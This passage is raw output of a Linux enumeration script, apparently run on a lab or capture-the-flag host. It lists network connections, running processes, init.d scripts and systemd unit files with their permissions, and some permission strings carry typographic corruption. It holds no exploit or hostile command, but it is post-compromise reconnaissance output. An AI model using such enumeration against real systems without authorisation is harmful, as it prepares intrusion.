tcp6 0 0 192.168.65.158:80 192.168.65.151:43402 ESTABLISHED -
tcp6 0 0 192.168.65.158:80 192.168.65.151:43406 ESTABLISHED -

[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 127.0.0.53:53 0.0.0.0:* -
udp 0 0 192.168.65.158:68 0.0.0.0:* -

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.2 159944 9172 ? Ss 17:24 0:02 /sbin/init maybe-ubiquity
root 2 0.0 0.0 0 0 ? S 17:24 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? I 17:24 0:00 [kworker/0:0]
-rwxr-xr-x 1 root root 129096 Jul 22 16:45 /lib/systemd/systemd-journald
-rwxr-xr-x 1 root root 219272 Jul 22 16:45 /lib/systemd/systemd-logind
-rwxr-xr-x 1 root root 1625168 Jul 22 16:45 /lib/systemd/systemd-networkd
-rwxr-xr-x 1 root root 378944 Jul 22 16:45 /lib/systemd/systemd-resolved
-rwxr-xr-x 1 root root 38976 Jul 22 16:45 /lib/systemd/systemd-timesyncd
-rwxr-xr-x 1 root root 584136 Jul 22 16:45 /lib/systemd/systemd-udevd
-rwxr-xr-x 1 root root 56552 Oct 15 2018 /sbin/agetty
lrwxrwxrwx 1 root root 20 Jul 22 16:45 /sbin/init -> /lib/systemd/systemd
-rwxr-xr-x 1 root root 84104 Jun 4 09:59 /sbin/lvmetad
-rwxr-xr-x 1 root root 125144 May 14 07:07 /usr/bin/VGAuthService
-rwxr-xr-x 1 root root 236584 Jun 10 18:05 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 18504 Nov 23 2018 /usr/bin/lxcfs
lrwxrwxrwx 1 root root 9 Oct 25 2018 /usr/bin/python3 -> python3.6
-rwxr-xr-x 1 root root 51456 May 14 07:07 /usr/bin/vmtoolsd
-rwxr-xr-x 1 root root 182552 Dec 18 2017 /usr/lib/accountsservice/accounts-daemon
-rwxr-xr-x 1 root root 14552 Mar 27 13:57 /usr/lib/policykit-1/polkitd
-rwxr-xr-x 1 root root 17572456 Jun 5 06:41 /usr/lib/snapd/snapd
-rwxr-xr-x 1 root root 671392 Aug 26 13:41 /usr/sbin/apache2
-rwxr-xr-x 1 root root 26632 Feb 20 2018 /usr/sbin/atd
-rwxr-xr-x 1 root root 47416 Nov 16 2017 /usr/sbin/cron
-rwxr-xr-x 1 root root 25019144 Jul 22 18:02 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 680488 Apr 24 2018 /usr/sbin/rsyslogd

[-] /etc/init.d/ binary permissions:
total 188
drwxr-xr-x 2 root root 4096 Aug 31 17:25 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rwxr-xr-x 1 root root 2269 Apr 22 2017 acpid
-rwxr-xr-x 1 root root 2489 Jul 16 18:14 apache-htcacheclean
-rwxr-xr-x 1 root root 8181 Jul 16 18:14 apache2
-rwxr-xr-x 1 root root 4335 Mar 22 2018 apparmor
-rwxr-xr-x 1 root root 2802 Nov 20 2017 apport
-rwxr-xr-x 1 root root 1071 Aug 21 2015 atd
-rwxr-xr-x 1 root root 1232 Apr 19 2018 console-setup.sh
-rwxr-xr-x 1 root root 3049 Nov 16 2017 cron
-rwxr-xr-x 1 root root 937 Mar 18 2018 cryptdisks
-rwxr-xr-x 1 root root 978 Mar 18 2018 cryptdisks-early
-rwxr-xr-x 1 root root 2813 Nov 15 2017 dbus
-rwxr-xr-x 1 root root 4489 Jun 28 2018 ebtables
-rwxr-xr-x 1 root root 985 Mar 18 16:11 grub-common
-rwxr-xr-x 1 root root 3809 Feb 14 2018 hwclock.sh
-rwxr-xr-x 1 root root 2444 Oct 25 2017 irqbalance
-rwxr-xr-x 1 root root 1503 Dec 12 2018 iscsid
-rwxr-xr-x 1 root root 1479 Feb 15 2018 keyboard-setup.sh
-rwxr-xr-x 1 root root 2044 Aug 15 2017 kmod
-rwxr-xr-x 1 root root 695 Dec 3 2017 lvm2
-rwxr-xr-x 1 root root 571 Dec 3 2017 lvm2-lvmetad
-rwxr-xr-x 1 root root 586 Dec 3 2017 lvm2-lvmpolld
-rwxr-xr-x 1 root root 2378 Nov 23 2018 lxcfs
-rwxr-xr-x 1 root root 2240 Nov 23 2018 lxd
-rwxr-xr-x 1 root root 2653 Jan 30 2019 mdadm
-rwxr-xr-x 1 root root 1249 Jan 30 2019 mdadm-waitidle
-rwxr-xr-x 1 root root 5607 Jan 12 2018 mysql
-rwxr-xr-x 1 root root 2503 Dec 12 2018 open-iscsi
-rwxr-xr-x 1 root root 1846 Apr 5 13:47 open-vm-tools
-rwxr-xr-x 1 root root 1366 Apr 4 14:33 plymouth
-rwxr-xr-x 1 root root 752 Apr 4 14:33 plymouth-log
-rwxr-xr-x 1 root root 1191 Jan 17 2018 procps
-rwxr-xr-x 1 root root 4355 Dec 13 2017 rsync
-rwxr-xr-x 1 root root 2864 Jan 14 2018 rsyslog
-rwxr-xr-x 1 root root 1222 May 21 2017 screen-cleanup
-rwxr-xr-x 1 root root 3837 Jan 25 2018 ssh
-rwxr-xr-x 1 root root 5974 Apr 20 2018 udev
-rwxr-xr-x 1 root root 2083 Aug 15 2017 ufw
-rwxr-xr-x 1 root root 1391 Apr 29 10:13 unattended-upgrades
-rwxr-xr-x 1 root root 1306 Oct 15 2018 uuidd

[-] /etc/init/ config file permissions:
total 12
drwxr-xr-x 2 root root 4096 Aug 20 06:22 .
drwxr-xr-x 97 root root 4096 Aug 31 17:25 ..
-rw-r--r-- 1 root root 1757 Jan 12 2018 mysql.conf

[-] /lib/systemd/* config file permissions:
/lib/systemd/:
total 7.3M
drwxr-xr-x 23 root root 36K Aug 31 17:25 system
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 network
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 system-generators
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 system-preset
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-sleep
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 system-shutdown
-rw-r--r-- 1 root root 2.3M Jul 22 16:45 libsystemd-shared-237.so
-rw-r--r-- 1 root root 699 Jul 22 16:45 resolv.conf
-rwxr-xr-x 1 root root 1.3K Jul 22 16:45 set-cpufreq
-rwxr-xr-x 1 root root 1.6M Jul 22 16:45 systemd
-rwxr-xr-x 1 root root 6.0K Jul 22 16:45 systemd-ac-power
-rwxr-xr-x 1 root root 18K Jul 22 16:45 systemd-backlight
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-binfmt
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-cgroups-agent
-rwxr-xr-x 1 root root 22K Jul 22 16:45 systemd-cryptsetup
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-dissect
-rwxr-xr-x 1 root root 18K Jul 22 16:45 systemd-fsck
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-fsckd
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-growfs
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-hibernate-resume
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-hostnamed
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-initctl
-rwxr-xr-x 1 root root 127K Jul 22 16:45 systemd-journald
-rwxr-xr-x 1 root root 35K Jul 22 16:45 systemd-localed
-rwxr-xr-x 1 root root 215K Jul 22 16:45 systemd-logind
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-makefs
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-modules-load
-rwxr-xr-x 1 root root 1.6M Jul 22 16:45 systemd-networkd
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-networkd-wait-online
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-quotacheck
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-random-seed
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-remount-fs
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-reply-password
-rwxr-xr-x 1 root root 371K Jul 22 16:45 systemd-resolved
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-rfkill
-rwxr-xr-x 1 root root 43K Jul 22 16:45 systemd-shutdown
-rwxr-xr-x 1 root root 19K Jul 22 16:45 systemd-sleep
-rwxr-xr-x 1 root root 23K Jul 22 16:45 systemd-socket-proxyd
-rwxr-xr-x 1 root root 11K Jul 22 16:45 systemd-sulogin-shell
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-sysctl
-rwxr-xr-x 1 root root 1.3K Jul 22 16:45 systemd-sysv-install
-rwxr-xr-x 1 root root 27K Jul 22 16:45 systemd-timedated
-rwxr-xr-x 1 root root 39K Jul 22 16:45 systemd-timesyncd
-rwxr-xr-x 1 root root 571K Jul 22 16:45 systemd-udevd
-rwxr-xr-x 1 root root 15K Jul 22 16:45 systemd-update-utmp
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-user-sessions
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-veritysetup
-rwxr-xr-x 1 root root 10K Jul 22 16:45 systemd-volatile-root

/lib/systemd/system:
total 1.1M
drwxr-xr-x 2 root root 4.0K Aug 31 17:25 apache2.service.d
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 sysinit.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 getty.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 graphical.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 local-fs.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 rescue.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 timers.target.wants
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 user@.service.d
drwxr-xr-x 2 root root 4.0K Aug 20 06:25 rc-local.service.d
lrwxrwxrwx 1 root root 9 Aug 5 19:24 screen-cleanup.service -> /dev/null
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 halt.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 initrd-switch-root.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 kexec.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 poweroff.target.wants
drwxr-xr-x 2 root root 4.0K Aug 5 19:24 reboot.target.wants
lrwxrwxrwx 1 root root 14 Jul 22 16:45 autovt@.service -> getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootlogd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootlogs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 bootmisc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkroot-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 checkroot.service -> /dev/null
-rw-r–r– 1 root root 1.1K Jul 22 16:45 console-getty.service
-rw-r–r– 1 root root 1.3K Jul 22 16:45 container-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 cryptdisks-early.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 cryptdisks.service -> /dev/null
lrwxrwxrwx 1 root root 13 Jul 22 16:45 ctrl-alt-del.target -> reboot.target
lrwxrwxrwx 1 root root 25 Jul 22 16:45 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service
lrwxrwxrwx 1 root root 23 Jul 22 16:45 dbus-org.freedesktop.locale1.service -> systemd-localed.service
lrwxrwxrwx 1 root root 22 Jul 22 16:45 dbus-org.freedesktop.login1.service -> systemd-logind.service
lrwxrwxrwx 1 root root 25 Jul 22 16:45 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 debug-shell.service
lrwxrwxrwx 1 root root 16 Jul 22 16:45 default.target -> graphical.target
-rw-r–r– 1 root root 797 Jul 22 16:45 emergency.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 fuse.service -> /dev/null
-rw-r–r– 1 root root 342 Jul 22 16:45 getty-static.service
-rw-r–r– 1 root root 2.0K Jul 22 16:45 getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 halt.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 hostname.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 hwclock.service -> /dev/null
-rw-r–r– 1 root root 670 Jul 22 16:45 initrd-cleanup.service
-rw-r–r– 1 root root 830 Jul 22 16:45 initrd-parse-etc.service
-rw-r–r– 1 root root 589 Jul 22 16:45 initrd-switch-root.service
-rw-r–r– 1 root root 704 Jul 22 16:45 initrd-udevadm-cleanup-db.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 killprocs.service -> /dev/null
-rw-r–r– 1 root root 717 Jul 22 16:45 kmod-static-nodes.service
lrwxrwxrwx 1 root root 28 Jul 22 16:45 kmod.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 28 Jul 22 16:45 module-init-tools.service -> systemd-modules-load.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 motd.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountall-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountall.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountdevsubfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountkernfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountnfs-bootclean.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 mountnfs.service -> /dev/null
-rw-r–r– 1 root root 362 Jul 22 16:45 ondemand.service
lrwxrwxrwx 1 root root 22 Jul 22 16:45 procps.service -> systemd-sysctl.service
-rw-r–r– 1 root root 609 Jul 22 16:45 quotaon.service
-rw-r–r– 1 root root 716 Jul 22 16:45 rc-local.service
lrwxrwxrwx 1 root root 16 Jul 22 16:45 rc.local.service -> rc-local.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rc.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rcS.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 reboot.service -> /dev/null
-rw-r–r– 1 root root 788 Jul 22 16:45 rescue.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 rmnologin.service -> /dev/null
lrwxrwxrwx 1 root root 15 Jul 22 16:45 runlevel0.target -> poweroff.target
lrwxrwxrwx 1 root root 13 Jul 22 16:45 runlevel1.target -> rescue.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel2.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel3.target -> multi-user.target
lrwxrwxrwx 1 root root 17 Jul 22 16:45 runlevel4.target -> multi-user.target
lrwxrwxrwx 1 root root 16 Jul 22 16:45 runlevel5.target -> graphical.target
lrwxrwxrwx 1 root root 13 Jul 22 16:45 runlevel6.target -> reboot.target
lrwxrwxrwx 1 root root 9 Jul 22 16:45 sendsigs.service -> /dev/null
-rw-r–r– 1 root root 1.5K Jul 22 16:45 serial-getty@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 stop-bootlogd-single.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 stop-bootlogd.service -> /dev/null
-rw-r–r– 1 root root 554 Jul 22 16:45 suspend-then-hibernate.target
-rw-r–r– 1 root root 1.4K Jul 22 16:45 system-update-cleanup.service
-rw-r–r– 1 root root 724 Jul 22 16:45 systemd-ask-password-console.service
-rw-r–r– 1 root root 752 Jul 22 16:45 systemd-ask-password-wall.service
-rw-r–r– 1 root root 752 Jul 22 16:45 systemd-backlight@.service
-rw-r–r– 1 root root 999 Jul 22 16:45 systemd-binfmt.service
-rw-r–r– 1 root root 537 Jul 22 16:45 systemd-exit.service
-rw-r–r– 1 root root 714 Jul 22 16:45 systemd-fsck-root.service
-rw-r–r– 1 root root 715 Jul 22 16:45 systemd-fsck@.service
-rw-r–r– 1 root root 551 Jul 22 16:45 systemd-fsckd.service
-rw-r–r– 1 root root 540 Jul 22 16:45 systemd-fsckd.socket
-rw-r–r– 1 root root 584 Jul 22 16:45 systemd-halt.service
-rw-r–r– 1 root root 671 Jul 22 16:45 systemd-hibernate-resume@.service
-rw-r–r– 1 root root 541 Jul 22 16:45 systemd-hibernate.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-hostnamed.service
-rw-r–r– 1 root root 818 Jul 22 16:45 systemd-hwdb-update.service
-rw-r–r– 1 root root 559 Jul 22 16:45 systemd-hybrid-sleep.service
-rw-r–r– 1 root root 551 Jul 22 16:45 systemd-initctl.service
-rw-r–r– 1 root root 771 Jul 22 16:45 systemd-journal-flush.service
-rw-r–r– 1 root root 686 Jul 22 16:45 systemd-journald-audit.socket
-rw-r–r– 1 root root 1.6K Jul 22 16:45 systemd-journald.service
-rw-r–r– 1 root root 597 Jul 22 16:45 systemd-kexec.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-localed.service
-rw-r–r– 1 root root 1.5K Jul 22 16:45 systemd-logind.service
-rw-r–r– 1 root root 733 Jul 22 16:45 systemd-machine-id-commit.service
-rw-r–r– 1 root root 1007 Jul 22 16:45 systemd-modules-load.service
-rw-r–r– 1 root root 740 Jul 22 16:45 systemd-networkd-wait-online.service
-rw-r–r– 1 root root 1.9K Jul 22 16:45 systemd-networkd.service
-rw-r–r– 1 root root 593 Jul 22 16:45 systemd-poweroff.service
-rw-r–r– 1 root root 655 Jul 22 16:45 systemd-quotacheck.service
-rw-r–r– 1 root root 792 Jul 22 16:45 systemd-random-seed.service
-rw-r–r– 1 root root 588 Jul 22 16:45 systemd-reboot.service
-rw-r–r– 1 root root 833 Jul 22 16:45 systemd-remount-fs.service
-rw-r–r– 1 root root 1.7K Jul 22 16:45 systemd-resolved.service
-rw-r–r– 1 root root 724 Jul 22 16:45 systemd-rfkill.service
-rw-r–r– 1 root root 573 Jul 22 16:45 systemd-suspend-then-hibernate.service
-rw-r–r– 1 root root 537 Jul 22 16:45 systemd-suspend.service
-rw-r–r– 1 root root 693 Jul 22 16:45 systemd-sysctl.service
-rw-r–r– 1 root root 1.1K Jul 22 16:45 systemd-timedated.service
-rw-r–r– 1 root root 1.4K Jul 22 16:45 systemd-timesyncd.service
-rw-r–r– 1 root root 659 Jul 22 16:45 systemd-tmpfiles-clean.service
-rw-r–r– 1 root root 764 Jul 22 16:45 systemd-tmpfiles-setup-dev.service
-rw-r–r– 1 root root 744 Jul 22 16:45 systemd-tmpfiles-setup.service
-rw-r–r– 1 root root 863 Jul 22 16:45 systemd-udev-settle.service
-rw-r–r– 1 root root 755 Jul 22 16:45 systemd-udev-trigger.service
-rw-r–r– 1 root root 985 Jul 22 16:45 systemd-udevd.service
-rw-r–r– 1 root root 797 Jul 22 16:45 systemd-update-utmp-runlevel.service
-rw-r–r– 1 root root 794 Jul 22 16:45 systemd-update-utmp.service
-rw-r–r– 1 root root 628 Jul 22 16:45 systemd-user-sessions.service
-rw-r–r– 1 root root 690 Jul 22 16:45 systemd-volatile-root.service
lrwxrwxrwx 1 root root 21 Jul 22 16:45 udev.service -> systemd-udevd.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountnfs.service -> /dev/null
lrwxrwxrwx 1 root root 9 Jul 22 16:45 umountroot.service -> /dev/null
lrwxrwxrwx 1 root root 27 Jul 22 16:45 urandom.service -> systemd-random-seed.service
-rw-r–r– 1 root root 593 Jul 22 16:45 user@.service
lrwxrwxrwx 1 root root 9 Jul 22 16:45 x11-common.service -> /dev/null
-rw-r–r– 1 root root 528 Jul 16 18:14 apache-htcacheclean.service
-rw-r–r– 1 root root 537 Jul 16 18:14 apache-htcacheclean@.service
-rw-r–r– 1 root root 346 Jul 16 18:14 apache2.service
-rw-r–r– 1 root root 418 Jul 16 18:14 apache2@.service
-rw-r–r– 1 root root 161 Jul 8 18:43 motd-news.timer
-rw-r–r– 1 root root 505 Jun 10 18:05 dbus.service
-rw-r–r– 1 root root 106 Jun 10 18:05 dbus.socket
-rw-r–r– 1 root root 340 Jun 5 06:41 snapd.autoimport.service
-rw-r–r– 1 root root 320 Jun 5 06:41 snapd.core-fixup.service
-rw-r–r– 1 root root 172 Jun 5 06:41 snapd.failure.service
-rw-r–r– 1 root root 322 Jun 5 06:41 snapd.seeded.service
-rw-r–r– 1 root root 477 Jun 5 06:41 snapd.service
-rw-r–r– 1 root root 372 Jun 5 06:41 snapd.snap-repair.service
-rw-r–r– 1 root root 281 Jun 5 06:41 snapd.snap-repair.timer
-rw-r–r– 1 root root 281 Jun 5 06:41 snapd.socket
-rw-r–r– 1 root root 521 Jun 5 06:41 snapd.system-shutdown.service
-rw-r–r– 1 root root 383 Jun 4 09:59 blk-availability.service
-rw-r–r– 1 root root 341 Jun 4 09:59 dm-event.service
-rw-r–r– 1 root root 248 Jun 4 09:59 dm-event.socket
-rw-r–r– 1 root root 345 Jun 4 09:59 lvm2-lvmetad.service
-rw-r–r– 1 root root 215 Jun 4 09:59 lvm2-lvmetad.socket
-rw-r–r– 1 root root 300 Jun 4 09:59 lvm2-lvmpolld.service
-rw-r–r– 1 root root 213 Jun 4 09:59 lvm2-lvmpolld.socket
-rw-r–r– 1 root root 693 Jun 4 09:59 lvm2-monitor.service
-rw-r–r– 1 root root 403 Jun 4 09:59 lvm2-pvscan@.service
lrwxrwxrwx 1 root root 9 Jun 4 09:59 lvm2.service -> /dev/null
-rw-r–r– 1 root root 466 May 14 07:05 open-vm-tools.service
-rw-r–r– 1 root root 385 May 14 07:05 vgauth.service
-rw-r–r– 1 root root 418 May 11 05:17 cloud-config.service
-rw-r–r– 1 root root 482 May 11 05:17 cloud-final.service
-rw-r–r– 1 root root 580 May 11 05:17 cloud-init-local.service
-rw-r–r– 1 root root 642 May 11 05:17 cloud-init.service
-rw-r–r– 1 root root 536 May 10 18:38 cloud-config.target
-rw-r–r– 1 root root 256 May 10 18:38 cloud-init.target
-rw-r–r– 1 root root 289 May 9 17:11 netplan-wpa@.service
-rw-r–r– 1 root root 238 May 7 09:19 apt-daily-upgrade.service
-rw-r–r– 1 root root 184 May 7 09:19 apt-daily-upgrade.timer
-rw-r–r– 1 root root 326 May 7 09:19 apt-daily.service
-rw-r–r– 1 root root 156 May 7 09:19 apt-daily.timer
-rw-r–r– 1 root root 372 Apr 29 10:13 unattended-upgrades.service
-rw-r–r– 1 root root 312 Apr 23 12:04 console-setup.service
-rw-r–r– 1 root root 287 Apr 23 12:04 keyboard-setup.service
-rw-r–r– 1 root root 330 Apr 23 12:04 setvtrgb.service
-rw-r–r– 1 root root 481 Apr 10 14:14 mdadm-grow-continue@.service
-rw-r–r– 1 root root 210 Apr 10 14:14 mdadm-last-resort@.service
-rw-r–r– 1 root root 179 Apr 10 14:14 mdadm-last-resort@.timer
-rw-r–r– 1 root root 670 Apr 10 14:14 mdadm-shutdown.service
lrwxrwxrwx 1 root root 9 Apr 10 14:14 mdadm-waitidle.service -> /dev/null
lrwxrwxrwx 1 root root 9 Apr 10 14:14 mdadm.service -> /dev/null
-rw-r–r– 1 root root 1.1K Apr 10 14:14 mdmon@.service
-rw-r–r– 1 root root 388 Apr 10 14:14 mdmonitor.service
-rw-r–r– 1 root root 250 Apr 9 21:01 ureadahead-stop.service
-rw-r–r– 1 root root 242 Apr 9 21:01 ureadahead-stop.timer
-rw-r–r– 1 root root 404 Apr 9 21:01 ureadahead.service
-rw-r–r– 1 root root 412 Apr 4 15:41 plymouth-halt.service
-rw-r–r– 1 root root 426 Apr 4 15:41 plymouth-kexec.service
lrwxrwxrwx 1 root root 27 Apr 4 15:41 plymouth-log.service -> plymouth-read-write.service
-rw-r–r– 1 root root 421 Apr 4 15:41 plymouth-poweroff.service
-rw-r–r– 1 root root 200 Apr 4 15:41 plymouth-quit-wait.service
-rw-r–r– 1 root root 194 Apr 4 15:41 plymouth-quit.service
-rw-r–r– 1 root root 244 Apr 4 15:41 plymouth-read-write.service
-rw-r–r– 1 root root 416 Apr 4 15:41 plymouth-reboot.service
-rw-r–r– 1 root root 532 Apr 4 15:41 plymouth-start.service
-rw-r–r– 1 root root 291 Apr 4 15:41 plymouth-switch-root.service
lrwxrwxrwx 1 root root 21 Apr 4 15:41 plymouth.service -> plymouth-quit.service
-rw-r–r– 1 root root 490 Apr 4 15:41 systemd-ask-password-plymouth.path
-rw-r–r– 1 root root 467 Apr 4 15:41 systemd-ask-password-plymouth.service
-rw-r–r– 1 root root 463 Mar 28 18:14 iscsid.service
-rw-r–r– 1 root root 242 Feb 6 2019 apport-autoreport.service
-rw-r–r– 1 root root 254 Jan 14 2019 thermald.service
-rw-r–r– 1 root root 368 Jan 9 2019 irqbalance.service
-rw-r–r– 1 root root 175 Dec 12 2018 iscsid.socket
-rw-r–r– 1 root root 987 Dec 12 2018 open-iscsi.service
-rw-r–r– 1 root root 605 Nov 23 2018 lxd.service
-rw-r–r– 1 root root 320 Nov 23 2018 lxd-containers.service
-rw-r–r– 1 root root 197 Nov 23 2018 lxd.socket
-rw-r–r– 1 root root 311 Nov 23 2018 lxcfs.service
-rw-r–r– 1 root root 92 Oct 15 2018 fstrim.service
-rw-r–r– 1 root root 170 Oct 15 2018 fstrim.timer
-rw-r–r– 1 root root 189 Oct 15 2018 uuidd.service
-rw-r–r– 1 root root 126 Oct 15 2018 uuidd.socket
-rw-r–r– 1 root root 618 Oct 15 2018 friendly-recovery.service
-rw-r–r– 1 root root 172 Oct 15 2018 friendly-recovery.target
-rw-r–r– 1 root root 258 Oct 15 2018 networkd-dispatcher.service
-rw-r–r– 1 root root 173 Aug 6 2018 motd-news.service
-rw-r–r– 1 root root 212 Jul 10 2018 apport-autoreport.path
-rw-r–r– 1 root root 456 Jun 28 2018 ebtables.service
-rw-r–r– 1 root root 309 May 30 2018 pollinate.service
-rw-r–r– 1 root root 290 Apr 24 2018 rsyslog.service
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel1.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel2.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel3.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel4.target.wants
drwxr-xr-x 2 root root 4.0K Apr 20 2018 runlevel5.target.wants
-rw-r–r– 1 root root 175 Mar 27 2018 polkit.service
-rw-r–r– 1 root root 544 Mar 22 2018 apparmor.service
-rw-r–r– 1 root root 169 Feb 20 2018 atd.service
-rw-r–r– 1 root root 919 Jan 28 2018 basic.target
-rw-r–r– 1 root root 419 Jan 28 2018 bluetooth.target
-rw-r–r– 1 root root 465 Jan 28 2018 cryptsetup-pre.target
-rw-r–r– 1 root root 412 Jan 28 2018 cryptsetup.target
-rw-r–r– 1 root root 750 Jan 28 2018 dev-hugepages.mount
-rw-r–r– 1 root root 665 Jan 28 2018 dev-mqueue.mount
-rw-r–r– 1 root root 471 Jan 28 2018 emergency.target
-rw-r–r– 1 root root 541 Jan 28 2018 exit.target
-rw-r–r– 1 root root 480 Jan 28 2018 final.target
-rw-r–r– 1 root root 506 Jan 28 2018 getty-pre.target
-rw-r–r– 1 root root 500 Jan 28 2018 getty.target
-rw-r–r– 1 root root 598 Jan 28 2018 graphical.target
-rw-r–r– 1 root root 527 Jan 28 2018 halt.target
-rw-r–r– 1 root root 509 Jan 28 2018 hibernate.target
-rw-r–r– 1 root root 530 Jan 28 2018 hybrid-sleep.target
-rw-r–r– 1 root root 593 Jan 28 2018 initrd-fs.target
-rw-r–r– 1 root root 561 Jan 28 2018 initrd-root-device.target
-rw-r–r– 1 root root 566 Jan 28 2018 initrd-root-fs.target
-rw-r–r– 1 root root 754 Jan 28 2018 initrd-switch-root.target
-rw-r–r– 1 root root 763 Jan 28 2018 initrd.target
-rw-r–r– 1 root root 541 Jan 28 2018 kexec.target
-rw-r–r– 1 root root 435 Jan 28 2018 local-fs-pre.target
-rw-r–r– 1 root root 547 Jan 28 2018 local-fs.target
-rw-r–r– 1 root root 445 Jan 28 2018 machine.slice
-rw-r–r– 1 root root 532 Jan 28 2018 multi-user.target
-rw-r–r– 1 root root 505 Jan 28 2018 network-online.target
-rw-r–r– 1 root root 502 Jan 28 2018 network-pre.target
-rw-r–r– 1 root root 521 Jan 28 2018 network.target
-rw-r–r– 1 root root 554 Jan 28 2018 nss-lookup.target
-rw-r–r– 1 root root 513 Jan 28 2018 nss-user-lookup.target
-rw-r–r– 1 root root 394 Jan 28 2018 paths.target
-rw-r–r– 1 root root 592 Jan 28 2018 poweroff.target
-rw-r–r– 1 root root 417 Jan 28 2018 printer.target
-rw-r–r– 1 root root 745 Jan 28 2018 proc-sys-fs-binfmt_misc.automount
-rw-r–r– 1 root root 655 Jan 28 2018 proc-sys-fs-binfmt_misc.mount
-rw-r–r– 1 root root 583 Jan 28 2018 reboot.target
-rw-r–r– 1 root root 549 Jan 28 2018 remote-cryptsetup.target
-rw-r–r– 1 root root 436 Jan 28 2018 remote-fs-pre.target
-rw-r–r– 1 root root 522 Jan 28 2018 remote-fs.target
-rw-r–r– 1 root root 492 Jan 28 2018 rescue.target
-rw-r–r– 1 root root 540 Jan 28 2018 rpcbind.target
